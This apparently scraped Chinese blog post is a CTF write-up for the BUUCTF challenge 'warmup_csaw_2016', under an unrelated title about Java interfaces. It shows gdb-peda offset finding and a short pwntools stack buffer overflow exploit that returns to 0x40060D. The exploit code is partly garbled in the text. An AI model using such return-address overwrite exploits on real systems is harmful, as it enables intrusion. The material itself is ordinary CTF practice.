java中的接口是类吗
291
2022-10-22
buu warmup_csaw_2016
查看文件类型
file target (已重命名目标文件为target)
64位elf 查看保护机制 checksec target结果为没有开启保护机制 GDB~peda调试 \>gdb target\>start(出现程序运行时的数据)\>pattern_create 300复制粘贴输入后读取rbp中的字符串,复制\>pattern_offset Crtl+shift+v读取为偏移量是64,考虑到Caller's rbp为八个字节,最终payload要用64+8。 payload from pwn importp = remote("ip address",port)payload = 'a'64+'b'*8+p64(0x40060D)p.sendline(payload)p.interactive() Python3 运行 \>python3 exp.py
获得flag。
补充一下
0x40060D是由系统提示获得的关键返回地址。
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~